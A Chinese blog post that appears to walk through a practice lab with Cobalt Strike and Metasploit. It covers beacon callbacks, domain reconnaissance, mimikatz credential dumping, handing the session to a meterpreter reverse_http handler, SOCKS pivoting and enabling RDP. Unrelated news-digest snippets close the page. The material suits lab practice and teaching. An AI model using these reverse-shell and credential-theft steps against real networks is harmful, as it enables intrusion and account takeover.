紅日安全靶機實戰(一) CS篇

2021-10-08 22:30:42 字數 2670 閱讀 7164

0x00 前言

之前是用 msf 來做的,這次嘗試嘗試用 cs 來做。之前得到webshell 的步驟就不說了,一樣的。直接從cs 上線開始講起。

另外,自己用的cs 使用 beacon/reverse_tcp listener 的時候,埠不監聽,試了好多網上的版本都是一樣,只能用beacon_http/reverse_http listenter 。 不知道大家有這個bug 沒

0x01 cs 上線

建立listener 和 payload ,然後蟻劍上傳paload ,直接終端執行,成功cs 上線:

0x02 目標資訊收集

首先,降低心跳值,預設是60s, 由於是測試環境,於是調整心跳值為 0:

shell systeminfo 檢視主機名,系統名稱,系統版本:

同時也可以得到主機域資訊和安裝的補丁

同時使用shell tasklist /svc 可以檢視執行的程序,同時根據程序判斷主機是否存在防毒軟體:

這裡列舉一些常見的防毒軟體名,取自:

然後域資訊收集和之前那篇一樣的,得到域控,域內主機名及ip ,域管理員:

網域名稱為 god

域中有三颱主機:

stu1.god.org 192.168.52.129 (控制的這台win 7)

root-tvi862ubeh.god.org 192.168.52.129

owa.god.org 192.168.52.130 為域控

域使用者有 : ligang , liukaifeng01 ,administrator

域管理員只有乙個: administrator

另外,cs中選擇主機,然後net view 之後會在target 中顯示結果,這點比msf看起來方便

其中 porst san 先用 arp 或者 icmp 去發現主機,然後對發現的主機進行埠掃瞄

0x03 得到域管密碼

然後load mimikatz:

得到域管的明文密碼

0x04 派生到msf

這裡試了試cs 的 portscan ,發現效果並不是很好,很多埠沒掃瞄出來,然後想用 cs 開 socks **,無奈本地cs 開socks **之後beacon 裡面就不能敲命令了,socks stop 也停不下來。

首先msf 中執行:

use exploit/multi/handler

set payload windows/meterpreter/reverse_http(跟cs上選用的payload一樣)

set lhost 192.168.127.130 //本地ip

set lport 8000

exploit

然後cs 上先建立乙個foreign listener ,host 選擇 msf 的ip ,post 選擇msf 監聽的port 。

然後spawn ,msf 就得到了cs 傳過來的會話

然後通過msf設定 socks 4 **,proxychains nmap 來掃瞄。

接著msf 用上篇說到的模組來命令執行,開啟3389等

0x05 後記

說說用cs 和 msf 的體驗和一些愚見:

(1)感覺msf更細一些,模組更多一些, 雖然cs 由各種各樣的外掛程式,但是整體還是沒有msf 細。

(2)cs 一些圖形化展示看起來更加直觀,而且圖形化介面在一定程度上還是比 命令行方便。但其實msf 用熟了之後也挺順手的。

(3)使用的時候還是需要聯合使用吧,兩個框架的側重點不同,cs 更加傾向於團隊合作(網上還說cs 更加傾向於後滲透)。

(4)cs 需要去網上找破解版,msf 直接是開源的,有什麼bug 啥的,可以去看issue , 而且社群更廣一些 。

(5)msf 和 cs 都是滲透的兩大神器,都很優秀。配合使用,達到最大的效果。

參考:

2023年7月24日安全快訊

漏洞即挖礦 dvp去中心化漏洞平台全球上線 大量藍芽硬體和系統驅動程式受加密bug影響,可能導致攻擊者獲取秘鑰 索尼修復2個sony ipela e系列的網路攝像頭產品的遠端執行 針對12個國家的150家銀行 的安全性測試 新mirai和gafgyt iot linux殭屍網路出現 建立表情符的ph...

8月14日 每日安全知識熱點

資訊類 黑客激進主義開始轉向惡意欺詐行動 麻省理工和微軟研究院製造乙個 智慧型 紋身,可以讓你遠端控制你的 技術類 使用afl對nginx進行fuzzing northsec 2016會議所有 rooting三星ip攝像頭 來自usenix的 針對蘋果imessage的選擇密文攻擊 armv8 sh...

9月1日 每日安全知識熱點

熱點概要 黑客竊取了6000多萬dropbox賬號已被證實真實性 yandex瀏覽器中的csrf漏洞允許偷取受害者瀏覽器資料 使用python進行暗網osint視覺化 powershell without powershell 如何繞過應用白名單,環境限制,和防毒軟體 國內熱詞 msn中文網被 給中...